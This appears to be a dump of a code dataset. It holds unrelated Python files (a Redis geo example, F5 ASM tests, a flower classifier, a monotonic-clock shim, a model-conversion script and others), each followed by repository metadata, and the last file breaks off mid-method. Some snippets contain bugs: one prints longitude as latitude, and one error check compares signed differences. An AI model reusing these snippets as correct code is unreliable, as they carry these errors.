"""
# define bus types (values stored in the BUS_TYPE column)
PQ = 1
PV = 2
REF = 3
NONE = 4
# define the indices (columns 0-12 must be present in the input case matrix)
BUS_I = 0  # bus number (1 to 29997)
BUS_TYPE = 1  # bus type
PD = 2  # Pd, real power demand (MW)
QD = 3  # Qd, reactive power demand (MVAr)
GS = 4  # Gs, shunt conductance (MW at V = 1.0 p.u.)
BS = 5  # Bs, shunt susceptance (MVAr at V = 1.0 p.u.)
BUS_AREA = 6  # area number, 1-100
VM = 7  # Vm, voltage magnitude (p.u.)
VA = 8  # Va, voltage angle (degrees)
BASE_KV = 9  # baseKV, base voltage (kV)
ZONE = 10  # zone, loss zone (1-999)
VMAX = 11  # maxVm, maximum voltage magnitude (p.u.)
VMIN = 12  # minVm, minimum voltage magnitude (p.u.)
# columns below are included in the OPF solution, not necessarily in input
# assume objective function has units, u
LAM_P = 13  # Lagrange multiplier on real power mismatch (u/MW)
LAM_Q = 14  # Lagrange multiplier on reactive power mismatch (u/MVAr)
MU_VMAX = 15  # Kuhn-Tucker multiplier on upper voltage limit (u/p.u.)
MU_VMIN = 16  # Kuhn-Tucker multiplier on lower voltage limit (u/p.u.)
# Additional pandapower extensions to ppc (note: indices 13/14 overlap with
# LAM_P/LAM_Q above -- the ZIP-load columns reuse the OPF result slots)
CID = 13  # coefficient of constant current load at rated voltage in range [0,1]
CZD = 14  # coefficient of constant impedance load at rated voltage in range [0,1]
bus_cols = 15
| 38.157303
| 95
| 0.654594
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 3,077
| 0.906066
|
3682efa29fdf319c29d1fc0f9982530abedd7083
| 2,586
|
py
|
Python
|
example.py
|
vinhntb/geo_redis
|
2b79ab844bdf1a56e442393911437c76449bedb0
|
[
"MIT"
] | null | null | null |
example.py
|
vinhntb/geo_redis
|
2b79ab844bdf1a56e442393911437c76449bedb0
|
[
"MIT"
] | null | null | null |
example.py
|
vinhntb/geo_redis
|
2b79ab844bdf1a56e442393911437c76449bedb0
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# !/usr/bin/python
#
# example.py
#
#
# Created by vinhntb on 6/27/17.
# Copyright (c) 2017 geo_redis. All rights reserved.
import sys
from bunch import Bunch
from constants import GEO_USER_VISITED
from geo_redis.geo_redis import GeoRedis
def add_user_visited():
    """Seed the GEO_USER_VISITED sorted set with eight sample user locations."""
    # Each entry carries (longitude, latitude) and the user id as the member.
    samples = [
        Bunch(longitude=13.583333, latitude=37.316667, member='101'),
        Bunch(longitude=13.361389, latitude=38.115556, member='102'),
        Bunch(longitude=13.583433, latitude=37.317667, member='103'),
        Bunch(longitude=13.583533, latitude=37.318667, member='104'),
        Bunch(longitude=13.583633, latitude=37.318767, member='105'),
        Bunch(longitude=13.583733, latitude=37.318867, member='106'),
        Bunch(longitude=13.361389, latitude=38.115556, member='107'),
        Bunch(longitude=15.087269, latitude=37.502669, member='108'),
    ]
    redis_instance = GeoRedis()
    for sample in samples:
        redis_instance.geo_add(GEO_USER_VISITED, **sample)
def get_geo_radius():
redis_instance = GeoRedis()
unit = 'm'
results = redis_instance.geo_radius(name=GEO_USER_VISITED, longitude=13.58, latitude=37.316, radius=500, unit=unit,
withcoord=True, withdist=True)
"""The results are in nested array depend of parameters input. At this example, we have parameters:
withcoord, withdist, withash. So result
1) member (user_id) [0]
2) distance [1]
3) 1) longitude [2][0]
2) latitude [2][1]
"""
print "The results: \n"
print "Total: %s" % len(results)
for member in results:
print '--------------------------------------\n'
print "member: %s \n" % member[0]
print "distance: %s%s \n" % (member[1], unit)
print "longitude: %s \n" % member[2][0]
print "latitude: %s \n" % member[2][0]
def main(argv):
    # Seed the sample locations, then run a radius query against them.
    add_user_visited()
    get_geo_radius()

if __name__ == '__main__':
    main(sys.argv)
| 35.424658
| 119
| 0.655066
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 824
| 0.318639
|
36838e2dabeef85a22ebde7d229426841026be1e
| 2,584
|
py
|
Python
|
f5/bigip/tm/asm/policies/test/functional/test_signatures.py
|
nghia-tran/f5-common-python
|
acb23a6e5830a119b460c19a578654113419f5c3
|
[
"Apache-2.0"
] | 272
|
2016-02-23T06:05:44.000Z
|
2022-02-20T02:09:32.000Z
|
f5/bigip/tm/asm/policies/test/functional/test_signatures.py
|
nghia-tran/f5-common-python
|
acb23a6e5830a119b460c19a578654113419f5c3
|
[
"Apache-2.0"
] | 1,103
|
2016-02-11T17:48:03.000Z
|
2022-02-15T17:13:37.000Z
|
f5/bigip/tm/asm/policies/test/functional/test_signatures.py
|
nghia-tran/f5-common-python
|
acb23a6e5830a119b460c19a578654113419f5c3
|
[
"Apache-2.0"
] | 167
|
2016-02-11T17:48:21.000Z
|
2022-01-17T20:13:05.000Z
|
# Copyright 2017 F5 Networks Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import pytest
from f5.bigip.tm.asm.policies.signatures import Signature
from f5.sdk_exception import UnsupportedOperation
from requests.exceptions import HTTPError
class TestSignature(object):
    """Functional tests for the ASM policy signatures sub-collection."""

    def test_create_raises(self, policy):
        # Signatures cannot be created through the REST API.
        with pytest.raises(UnsupportedOperation):
            policy.signatures_s.signature.create()

    def test_delete_raises(self, policy):
        # Signatures cannot be deleted through the REST API.
        with pytest.raises(UnsupportedOperation):
            policy.signatures_s.signature.delete()

    def test_refresh(self, policy):
        collection = policy.signatures_s.get_collection()
        sig_id = str(collection[1].id)
        first = policy.signatures_s.signature.load(id=sig_id)
        second = policy.signatures_s.signature.load(id=sig_id)
        assert first.kind == second.kind
        assert first.performStaging == second.performStaging
        # Modify through one handle; the other only sees it after refresh().
        second.modify(performStaging=False)
        assert first.performStaging is True
        assert second.performStaging is False
        first.refresh()
        assert first.performStaging is False

    def test_load_no_object(self, policy):
        # Loading an unknown id must surface the server's 404.
        with pytest.raises(HTTPError) as err:
            policy.signatures_s.signature.load(id='Lx3553-321')
        assert err.value.response.status_code == 404

    def test_load(self, policy):
        collection = policy.signatures_s.get_collection()
        sig_id = str(collection[1].id)
        first = policy.signatures_s.signature.load(id=sig_id)
        assert first.kind == 'tm:asm:policies:signatures:signaturestate'
        assert first.performStaging is True
        first.modify(performStaging=False)
        assert first.performStaging is False
        second = policy.signatures_s.signature.load(id=first.id)
        assert first.selfLink == second.selfLink
        assert first.kind == second.kind
        assert first.performStaging == second.performStaging

    def test_signatures_subcollection(self, policy):
        collection = policy.signatures_s.get_collection()
        assert isinstance(collection, list)
        assert len(collection)
        assert isinstance(collection[0], Signature)
| 38
| 74
| 0.705882
| 1,834
| 0.709752
| 0
| 0
| 0
| 0
| 0
| 0
| 622
| 0.240712
|
3686fecb8e7eab5dbc7a6f5508649140b2813832
| 9,711
|
py
|
Python
|
functions.py
|
anoopjakob/flowers_classifier
|
554a7a408dbc4b40cee8098bada548bcea25d80f
|
[
"MIT"
] | null | null | null |
functions.py
|
anoopjakob/flowers_classifier
|
554a7a408dbc4b40cee8098bada548bcea25d80f
|
[
"MIT"
] | null | null | null |
functions.py
|
anoopjakob/flowers_classifier
|
554a7a408dbc4b40cee8098bada548bcea25d80f
|
[
"MIT"
] | null | null | null |
import torch
import numpy as np
from PIL import Image
from torch import nn
from torch import optim
import torch.nn.functional as F
from torchvision import datasets, transforms, models
# changing the already created codes in jupyter notebbooks to a functions
def load_data(data_dir):
    """Build dataloaders and datasets rooted at data_dir/{train,test,valid}.

    Returns (trainloader, testloader, validloader,
             train_data, test_data, valid_data).
    """
    normalize = transforms.Normalize([0.485, 0.456, 0.406],
                                     [0.229, 0.224, 0.225])
    # Augmented pipeline used for training only.
    train_transforms = transforms.Compose([
        transforms.RandomRotation(30),
        transforms.RandomResizedCrop(224),
        transforms.RandomHorizontalFlip(),
        transforms.ToTensor(),
        normalize,
    ])
    # Deterministic pipeline shared by validation and testing.
    eval_transforms = transforms.Compose([
        transforms.Resize(256),
        transforms.CenterCrop(224),
        transforms.ToTensor(),
        normalize,
    ])
    train_data = datasets.ImageFolder(data_dir + '/train', transform=train_transforms)
    test_data = datasets.ImageFolder(data_dir + '/test', transform=eval_transforms)
    valid_data = datasets.ImageFolder(data_dir + '/valid', transform=eval_transforms)
    # Only the training batches are shuffled so the model trains best.
    trainloader = torch.utils.data.DataLoader(train_data, batch_size=64, shuffle=True)
    testloader = torch.utils.data.DataLoader(test_data, batch_size=32)
    validloader = torch.utils.data.DataLoader(valid_data, batch_size=32)
    return trainloader, testloader, validloader, train_data, test_data, valid_data
# loading and processing image to use in the final stage of prediction
# this function gets a image path and converts it into tensor and then to numpy array of optimum requirements
def process_image(image):
    ''' Scales, crops, and normalizes a PIL image for a PyTorch model.

    image: path to an image file *without* extension ('.jpg' is appended).
    Returns a FloatTensor with a leading batch dimension: (1, C, H, W).
    '''
    # NOTE(review): the caller passes the path without extension -- confirm
    # that all inputs really are .jpg files.
    pil_im = Image.open(f'{image}.jpg')
    # Same deterministic pipeline used for evaluation data.
    transform = transforms.Compose([transforms.Resize(256),
                                    transforms.CenterCrop(224),
                                    transforms.ToTensor(),
                                    transforms.Normalize([0.485, 0.456, 0.406],
                                                         [0.229, 0.224, 0.225])])
    pil_tfd = transform(pil_im)
    # Convert to a float tensor via numpy.
    img_tensor = torch.from_numpy(np.array(pil_tfd)).type(torch.FloatTensor)
    # Add the batch dimension the network expects.
    return img_tensor.unsqueeze_(0)
# converting the new classifer code in jupyter notebook to function
def build_classifier(model, input_units, hidden_units, dropout):
    """Freeze model's pretrained weights and attach a fresh classifier head.

    The head maps input_units -> hidden_units -> 102 flower classes with
    ReLU, dropout and a LogSoftmax output. Returns the same model object.
    """
    from collections import OrderedDict

    # Only the new classifier below should train; the pretrained feature
    # weights stay fixed (the classifier is assigned afterwards, so its
    # parameters keep requires_grad=True).
    for param in model.parameters():
        param.requires_grad = False

    model.classifier = nn.Sequential(OrderedDict([
        ('fc1', nn.Linear(input_units, hidden_units)),
        ('relu', nn.ReLU()),
        ('dropout1', nn.Dropout(dropout)),
        ('fc2', nn.Linear(hidden_units, 102)),
        ('output', nn.LogSoftmax(dim=1)),
    ]))
    return model
def validation(model, validloader, criterion, gpu_mode):
    """Run one pass over validloader; return (total_loss, total_accuracy).

    Both returned values are sums over batches -- divide each by
    len(validloader) to obtain per-batch means.
    """
    valid_loss = 0
    accuracy = 0
    # Idiom cleanup: truthiness instead of `== True` and dangling `else: pass`.
    if gpu_mode:
        model.to('cuda')
    for images, labels in validloader:
        # Move data to the GPU only when requested AND available.
        if gpu_mode and torch.cuda.is_available():
            images, labels = images.to('cuda'), labels.to('cuda')
        output = model.forward(images)
        valid_loss += criterion(output, labels).item()
        # The model emits log-probabilities; exp() recovers probabilities.
        ps = torch.exp(output)
        # Fraction of predictions matching the labels in this batch.
        equality = (labels.data == ps.max(dim=1)[1])
        accuracy += equality.type(torch.FloatTensor).mean()
    return valid_loss, accuracy
def train_model(model, epochs, trainloader, validloader, criterion, optimizer, gpu_mode):
    """Train model for `epochs` over trainloader, validating periodically.

    Runs a validation pass (and prints running statistics) every
    `print_every` training iterations. Returns (model, optimizer).
    """
    iterations = 0
    print_every = 4  # validate every 4 training iterations
    # Idiom cleanup: truthiness instead of `== True` / `else: pass`.
    if gpu_mode:
        model.to('cuda')
    for e in range(epochs):
        running_loss = 0
        for ii, (inputs, labels) in enumerate(trainloader):
            iterations += 1
            print('Iteration no:',ii+1)
            if gpu_mode:
                inputs, labels = inputs.to('cuda'), labels.to('cuda')
            # Gradients accumulate by default; clear them for each batch.
            optimizer.zero_grad()
            outputs = model.forward(inputs)
            loss = criterion(outputs, labels)
            loss.backward()
            optimizer.step()
            running_loss += loss.item()
            if iterations % print_every == 0:
                # Evaluation mode + no-grad for the validation pass.
                model.eval()
                with torch.no_grad():
                    valid_loss, accuracy = validation(model, validloader, criterion, gpu_mode)
                print(f"No. epochs: {e+1}, \
                Training Loss: {round(running_loss/print_every,3)} \
                Valid Loss: {round(valid_loss/len(validloader),3)} \
                Valid Accuracy: {round(float(accuracy/len(validloader)),3)}")
                running_loss = 0
                # Turn training back on.
                model.train()
    return model, optimizer
def test_model(model, testloader, gpu_mode):
correct = 0
total = 0
if gpu_mode == True:
model.to('cuda')
else:
pass
with torch.no_grad():
# loading iterables from the test loader
for ii, (images, labels) in enumerate(testloader):
if gpu_mode == True:
images, labels = images.to('cuda'), labels.to('cuda')
else:
pass
outputs = model(images)
_, predicted = torch.max(outputs.data, 1)
total += labels.size(0)
correct += (predicted == labels).sum().item()
print(f"Test accuracy of model for {total} images: {round(100 * correct / total,3)}%")
def save_model(model, train_data, optimizer, save_dir, epochs):
    """Serialize a training checkpoint to save_dir.

    Stores model weights, the (custom) classifier, the class-to-index
    mapping from train_data, the optimizer state and the epoch count.
    """
    checkpoint = {'state_dict': model.state_dict(),
                  'classifier': model.classifier,
                  'class_to_idx': train_data.class_to_idx,
                  # Bug fix: call state_dict() -- the original stored the
                  # bound method object instead of the optimizer's state.
                  'opt_state': optimizer.state_dict(),
                  'num_epochs': epochs}
    return torch.save(checkpoint, save_dir)
def load_checkpoint(model, save_dir, gpu_mode):
    """Restore classifier, weights and class-index mapping onto model.

    When gpu_mode is not True, tensors are remapped onto the CPU.
    """
    # Force tensors onto the CPU unless the GPU was explicitly requested.
    load_kwargs = {} if gpu_mode == True else {
        'map_location': lambda storage, loc: storage}
    checkpoint = torch.load(save_dir, **load_kwargs)
    model.classifier = checkpoint['classifier']
    model.load_state_dict(checkpoint['state_dict'])
    model.class_to_idx = checkpoint['class_to_idx']
    return model
def predict(processed_image, loaded_model, topk, gpu_mode):
    """Return the top-k (probabilities, class labels) for one image tensor.

    processed_image: (1, C, H, W) tensor as produced by process_image.
    Returns (probs_top_list, classes_top_list) for the single image.
    """
    loaded_model.eval()
    if gpu_mode:
        loaded_model.to('cuda')
    else:
        loaded_model.cpu()
    # No gradients needed for inference.
    with torch.no_grad():
        output = loaded_model.forward(processed_image)
    # The model emits log-probabilities; exp() recovers probabilities.
    probs = torch.exp(output)
    probs_top, index_top = probs.topk(topk)
    # Bug fix: move tensors to the CPU *before* converting to numpy -- the
    # original called .cpu() on numpy arrays, which raises AttributeError.
    probs_top_list = probs_top.cpu().numpy()[0]
    index_top_list = index_top.cpu().numpy()[0]
    # Invert the class->index mapping to translate indices back to labels.
    indx_to_class = {x: y for y, x in loaded_model.class_to_idx.items()}
    classes_top_list = [indx_to_class[index] for index in index_top_list]
    return probs_top_list, classes_top_list
| 32.69697
| 109
| 0.571105
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 2,493
| 0.256719
|
3689044eb37e849dc16de8bc84d7a338cb4ea424
| 4,232
|
py
|
Python
|
monotonic_cffi.py
|
rkyoto/monotonic_cffi
|
8b2394ee65bcf16ab8d47f53db013ed39289a8d4
|
[
"Apache-2.0"
] | 1
|
2016-05-03T06:51:10.000Z
|
2016-05-03T06:51:10.000Z
|
monotonic_cffi.py
|
rkyoto/monotonic_cffi
|
8b2394ee65bcf16ab8d47f53db013ed39289a8d4
|
[
"Apache-2.0"
] | null | null | null |
monotonic_cffi.py
|
rkyoto/monotonic_cffi
|
8b2394ee65bcf16ab8d47f53db013ed39289a8d4
|
[
"Apache-2.0"
] | null | null | null |
"""
monotonic_cffi:
Just a cffi version of existing monotonic module on PyPI. See:
https://pypi.python.org/pypi/monotonic
Tested with PyPy 2.6.1 and 4.0.0 on Windows, OSX and Ubuntu.
Copyright 2015 Matt Jones <mattjones1811@hotmail.com>
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import ctypes.util
import os
import platform
import re
import sys
import time
from cffi import FFI
__all__ = ('monotonic',)
def get_os_release():
    """Get the leading numeric component of the OS release string."""
    # Raw string: '\d' in a plain literal is an invalid escape sequence
    # (DeprecationWarning, and an error in future Python versions).
    return re.match(r'[\d.]+', platform.release()).group(0)
def compare_versions(v1, v2):
    """Compare two dotted version strings.

    Returns -1, 0 or 1 as v1 is older than, equal to, or newer than v2.
    Trailing ".0" components are ignored, so "2.6" == "2.6.0".
    """
    def normalize(v):
        # Strip trailing zero components, then split into integer parts.
        return [int(part) for part in re.sub(r'(\.0+)*$', '', v).split('.')]
    left, right = normalize(v1), normalize(v2)
    # (a > b) - (a < b) replaces Python 2's cmp(), which no longer exists;
    # the original also compared map objects, which fails on Python 3.
    return (left > right) - (left < right)
try:
    # Python 3.3+ provides a monotonic clock natively; prefer it.
    monotonic = time.monotonic
except AttributeError:
    try:
        ffi = FFI()
        if sys.platform == 'darwin':  # OS X, iOS
            # using mach_absolute_time, scaled by the kernel timebase ratio
            ffi.cdef('''
            uint64_t mach_absolute_time(void);
            typedef struct {
                uint32_t numer;
                uint32_t denom;
            } mach_timebase_info_data_t;
            int mach_timebase_info(mach_timebase_info_data_t *info);
            ''')
            libc = ffi.dlopen('/usr/lib/libc.dylib')
            timebase = ffi.new('mach_timebase_info_data_t *')
            libc.mach_timebase_info(timebase)
            # Convert raw ticks to seconds: ticks * numer/denom yields ns.
            ticks_per_second = timebase[0].numer / timebase[0].denom * 1.0e9
            def monotonic():
                """Monotonic clock, cannot go backward."""
                return libc.mach_absolute_time() / ticks_per_second
        elif (sys.platform.startswith('win32')
                or sys.platform.startswith('cygwin')):
            # Windows Vista / Windows Server 2008 or newer.
            # GetTickCount64 returns milliseconds since boot.
            ffi.cdef('''
            uint64_t GetTickCount64(void);
            ''')
            kernel32 = ffi.dlopen('kernel32.dll')
            def monotonic():
                """Monotonic clock, cannot go backward."""
                return kernel32.GetTickCount64() / 1000.0
        else:
            # using clock_gettime on POSIX systems
            ffi.cdef('''
            struct timespec {
                long tv_sec;
                long tv_nsec;
            };
            int clock_gettime(long clk_id, struct timespec *tp);
            ''')
            # clock_gettime lives in libc on modern systems, librt on older.
            try:
                so = ffi.dlopen(ctypes.util.find_library('c'))
                clock_gettime = so.clock_gettime
            except AttributeError:
                so = ffi.dlopen(ctypes.util.find_library('rt'))
                clock_gettime = so.clock_gettime
            tp = ffi.new('struct timespec *')
            # Pick the per-platform clock id constant.
            if sys.platform.startswith('linux'):
                if compare_versions(get_os_release(), '2.6.28') > 0:
                    CLOCK_MONOTONIC = 4  # CLOCK_MONOTONIC_RAW
                else:
                    CLOCK_MONOTONIC = 1
            elif sys.platform.startswith('freebsd'):
                CLOCK_MONOTONIC = 4
            elif sys.platform.startswith('sunos5'):
                CLOCK_MONOTONIC = 4
            elif 'bsd' in sys.platform:
                CLOCK_MONOTONIC = 3
            def monotonic():
                """Monotonic clock, cannot go backward."""
                # clock_gettime returns non-zero on failure.
                if clock_gettime(CLOCK_MONOTONIC, tp):
                    errno = ffi.errno
                    raise OSError(errno, os.strerror(errno))
                return tp[0].tv_sec + tp[0].tv_nsec / 1.0e9
        # Perform a sanity-check: the first reading must not exceed the second.
        if monotonic() - monotonic() > 0:
            raise ValueError('monotonic() is not monotonic!')
    except Exception:
        raise RuntimeError('no suitable implementation for this system')
| 31.117647
| 76
| 0.577977
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,973
| 0.46621
|
3689c5f926602b9755b6a68b88197732ca844b70
| 1,141
|
py
|
Python
|
renormalizer/mps/tests/test_mpproperty.py
|
shuaigroup/Renormalizer
|
963d52efdaa247320e781a96b64d41c9cadf6f0e
|
[
"Apache-2.0"
] | 27
|
2019-09-02T08:35:01.000Z
|
2022-02-22T08:18:02.000Z
|
renormalizer/mps/tests/test_mpproperty.py
|
shuaigroup/Renormalizer
|
963d52efdaa247320e781a96b64d41c9cadf6f0e
|
[
"Apache-2.0"
] | 54
|
2019-08-30T12:18:39.000Z
|
2022-03-20T13:23:07.000Z
|
renormalizer/mps/tests/test_mpproperty.py
|
shuaigroup/Renormalizer
|
963d52efdaa247320e781a96b64d41c9cadf6f0e
|
[
"Apache-2.0"
] | 6
|
2019-09-10T03:25:28.000Z
|
2021-11-20T18:41:58.000Z
|
# -*- coding: utf-8 -*-
# Author: Jiajun Ren <jiajunren0522@gmail.com>
# Weitang Li <liwt31@163.com>
import pytest
from renormalizer.mps import Mps, Mpo, MpDm, ThermalProp
from renormalizer.mps.backend import np
from renormalizer.tests.parameter import holstein_model
from renormalizer.utils import Quantity
# Onsite operator creating an electron on the middle molecule of the chain.
creation_operator = Mpo.onsite(
    holstein_model, r"a^\dagger", dof_set={holstein_model.mol_num // 2}
)
def check_property(mp):
    """Assert mp is normalized, carries one electron on the middle molecule,
    and has no phonon occupation."""
    expected_e = np.zeros(holstein_model.mol_num)
    expected_e[holstein_model.mol_num // 2] = 1
    assert mp.norm == pytest.approx(1)
    assert np.allclose(mp.e_occupations, expected_e)
    assert np.allclose(mp.ph_occupations, 0)
def test_mps():
    """Creation operator applied to the ground state yields one electron."""
    ground = Mps.ground_state(holstein_model, max_entangled=False)
    check_property(creation_operator @ ground)
def test_mpo():
    """Same check on a thermally propagated max-entangled density matrix."""
    dm = MpDm.max_entangled_gs(holstein_model)
    beta = Quantity(10, "K").to_beta()
    prop = ThermalProp(dm, exact=True, space="GS")
    # Imaginary-time evolution down to inverse temperature beta.
    prop.evolve(None, 500, beta / 1j)
    check_property(creation_operator @ prop.latest_mps)
| 28.525
| 71
| 0.725679
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 125
| 0.109553
|
368bbba6590cf73d81aef3506e5c56c32a3d71dc
| 4,661
|
py
|
Python
|
pelee/pth2keras.py
|
DragonGongY/mmdet-ui
|
41582b0ee2b3d9c631ee48540ca8a6d87be362e0
|
[
"Apache-2.0"
] | 1
|
2021-12-24T05:28:20.000Z
|
2021-12-24T05:28:20.000Z
|
pelee/pth2keras.py
|
DragonGongY/mmdet-ui
|
41582b0ee2b3d9c631ee48540ca8a6d87be362e0
|
[
"Apache-2.0"
] | null | null | null |
pelee/pth2keras.py
|
DragonGongY/mmdet-ui
|
41582b0ee2b3d9c631ee48540ca8a6d87be362e0
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
import sys
import numpy as np
import torch
from torch.autograd import Variable
from pytorch2keras.converter import pytorch_to_keras
import torchvision
import os.path as osp
import os
# Select the TensorFlow backend before Keras is imported.
os.environ['KERAS_BACKEND'] = 'tensorflow'
from keras import backend as K
# Reset any prior Keras graph/session state.
K.clear_session()
K.set_image_dim_ordering('tf')
import test
import tensorflow as tf
import torch
from torch import nn
from torchsummary import summary
from torch.autograd import Variable
import tensorflow
from tensorflow.python.keras.backend import get_session
from tensorflow.python.keras.models import load_model
from tensorflow.python.framework import graph_util, graph_io
from keras.utils import plot_model
# K.set_image_data_format('channels_first') 0
import cv2
# Restrict TensorFlow/PyTorch to GPU index 1 only.
os.environ["CUDA_VISIBLE_DEVICES"] = "1"
def softmax(x):
    """Return the softmax of x as a numpy array.

    Shifts the input by its maximum first so that large logits cannot
    overflow np.exp() -- mathematically identical to the naive form.
    """
    exp_x = np.exp(x - np.max(x))
    softmax_x = exp_x / np.sum(exp_x)
    return softmax_x
def check_error(output, k_model, input_np, epsilon=1e-3):
    """Compare the pytorch output against the keras model's prediction.

    output: sequence whose first element is the pytorch output tensor.
    Prints and returns the max elementwise difference; raises AssertionError
    when that difference is not below epsilon.
    """
    pytorch_output = output[0].data.cpu().numpy()
    keras_output = k_model.predict(input_np)[0]
    # NOTE(review): this is a *signed* max difference, not abs(); a large
    # negative deviation would pass the check -- confirm that is intended.
    error = np.max(pytorch_output - keras_output)
    print('Error:', error)
    assert error < epsilon
    return error
import numpy as np
def normalization0_1(data):
    """Min-max scale data to [0, 1], then apply ImageNet mean/std normalization."""
    lo, hi = np.min(data), np.max(data)
    scaled = (data - lo) / (hi - lo)
    imagenet_mean = [0.485, 0.456, 0.406]
    imagenet_std = [0.229, 0.224, 0.225]
    return (scaled - imagenet_mean) / imagenet_std
def h5_to_pb(h5_model, output_dir, model_name, out_prefix="output_", ):
    """Freeze a loaded Keras .h5 model into a TensorFlow .pb graph file.

    Creates output_dir if needed, aliases the model's first output tensor to
    out_prefix + "0", converts all graph variables to constants, and writes
    the frozen graph as output_dir/model_name in binary format.
    """
    if osp.exists(output_dir) == False:
        os.mkdir(output_dir)
    # Name of the frozen graph's output node (taken from init_graph).
    out_nodes = ["output_0_1"]  ##get from init_graph
    # out_nodes.append(out_prefix + str(0))
    tf.identity(h5_model.output[0], out_prefix + str(0))
    sess = get_session()
    init_graph = sess.graph.as_graph_def()  ##get out_nodes
    # Bake variable values into constants so the graph is self-contained.
    main_graph = graph_util.convert_variables_to_constants(sess, init_graph, out_nodes)
    graph_io.write_graph(main_graph, output_dir, name=model_name, as_text=False)
if __name__ == '__main__':
    ##step1: load pytorch model
    model = torch.load("/home/dp/Desktop/algorithms/Pelee.Pytorch/weights/Pelee_COCO_size304_epoch40.pth")
    model = model.cuda()  ##cuda
    summary(model, (3, 304, 304))  ##summary(model, (channels, pic_h, pic_w))
    model.eval()
    ##step2: pytorch .pth to keras .h5 and test .h5
    input_np = np.random.uniform(0, 1, (1, 3, 304, 304))
    input_var = Variable(torch.FloatTensor(input_np)).cuda()  ##cuda
    k_model = pytorch_to_keras(model, input_var, (3, 304, 304,), verbose=True, name_policy='short')
    k_model.summary()
    k_model.save('my_model.h5')
    output = model(input_var)
    check_error(output, k_model, input_np)  ## check the error between .pth and .h5
    ##step3: load .h5 and .h5 to .pb
    tf.keras.backend.clear_session()
    tf.keras.backend.set_learning_phase(0)  ## required: inference mode before loading
    my_model = load_model('my_model.h5')
    h5_to_pb(my_model, output_dir='./model/', model_name='model.pb')
    ##step4: load .pb and test .pb
    pb_path = './model/model.pb'
    with tf.Session() as sess:
        tf.global_variables_initializer().run()
        graph_def = tf.GraphDef()
        with tf.gfile.GFile(pb_path, 'rb') as f:
            graph_def.ParseFromString(f.read())
            _ = tf.import_graph_def(graph_def, name="")
        pic_file = './datasets/data'
        pic_list = os.listdir(pic_file)
        for name in pic_list:
            img_path = '{}/{}'.format(pic_file, name)
            im = cv2.imread(img_path)
            im = cv2.cvtColor(im, cv2.COLOR_BGR2RGB)
            img = cv2.resize(im, (304, 304))
            img = np.asarray(img, dtype=np.float32)
            img = normalization0_1(img)
            # Channels-first layout plus a batch dimension for the graph input.
            img_data = np.transpose(img, (2, 0, 1))
            img_input = np.asarray(img_data, dtype=np.float32)[np.newaxis, :, :, :]
            input = sess.graph.get_tensor_by_name("input_0:0")
            output = sess.graph.get_tensor_by_name("output_0_1:0")
            pre_label = sess.run([output], feed_dict={input: img_input})
            pre_label = pre_label[0][0]
            pre_label = np.argmax(softmax(pre_label))
            print('------------------------')
            # Bug fix: the loop variable is `name`; `pic_name` was undefined
            # and raised NameError on the first image.
            print('{} prelabel is {}'.format(name, pre_label))
| 33.292857
| 106
| 0.657584
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,066
| 0.228314
|
368cb9e63af4447a8e0ac9131b7ee4fdf5b50b5c
| 1,997
|
py
|
Python
|
marketservice/models.py
|
mrprofessor/farmersmarket
|
6c835ccb458a0533fe79a9a264fe5a084d647db3
|
[
"MIT"
] | null | null | null |
marketservice/models.py
|
mrprofessor/farmersmarket
|
6c835ccb458a0533fe79a9a264fe5a084d647db3
|
[
"MIT"
] | null | null | null |
marketservice/models.py
|
mrprofessor/farmersmarket
|
6c835ccb458a0533fe79a9a264fe5a084d647db3
|
[
"MIT"
] | null | null | null |
import json
from typing import List, Literal, Union
class Product:
    """A purchasable item identified by a short product code."""

    def __init__(self, name: str, code: str, price: float):
        self.name, self.code, self.price = name, code, price
# Breakdown of a coupon's description into quantifiable attributes.
# For example, BOGO ("buy one get one") on coffee translates to an object
# with these properties:
#   target = "CF1"          # product code that triggers the coupon
#   apply_on = "CF1"        # product code the discount applies to
#   discount = 100
#   discount_type = "percent"
#   trigger_limit = 1       # purchases needed to trigger the discount
#   limit = 0               # 0 means no limit
#   apply_all = False
class Coupon:
    """A discount rule applied to basket items.

    Bug fix: discount_type was annotated ``Union["percent", "fixed"]``,
    which is invalid typing (string literals are forward references, not
    types); ``Literal`` expresses the intended closed set of values.
    """

    def __init__(
        self,
        name: str,
        description: str,
        target: str,
        apply_on: str,
        discount: float,
        discount_type: Literal["percent", "fixed"],
        trigger_limit: int,
        limit: int,
        apply_all: bool,
    ):
        self.name = name
        self.description = description
        self.target = target
        self.apply_on = apply_on
        self.discount = discount
        self.discount_type = discount_type
        self.trigger_limit = trigger_limit
        self.limit = limit
        self.apply_all = apply_all
class BasketItem:
    """A product in the basket plus the coupon/discount applied to it."""

    def __init__(
        self,
        product: Product,
        coupon: Coupon = None,
        discount: float = 0.00,
        should_apply: bool = True,
    ):
        # should_apply marks whether the coupon is still eligible to fire.
        self.product = product
        self.coupon = coupon
        self.discount = discount
        self.should_apply = should_apply
class Basket:
    """A collection of BasketItems with discounts applied per item."""

    def __init__(self, items: List["BasketItem"] = None):
        # Robustness fix: default to an empty list instead of None so that
        # total() and to_dict() on an empty Basket() do not raise TypeError.
        self.basket_items = items if items is not None else []

    def to_dict(self):
        """Serialize the basket (items plus total) into plain dict/list types."""
        return {
            "basket_items": json.loads(
                json.dumps(self.basket_items, default=lambda x: x.__dict__)
            ),
            "total": self.total(),
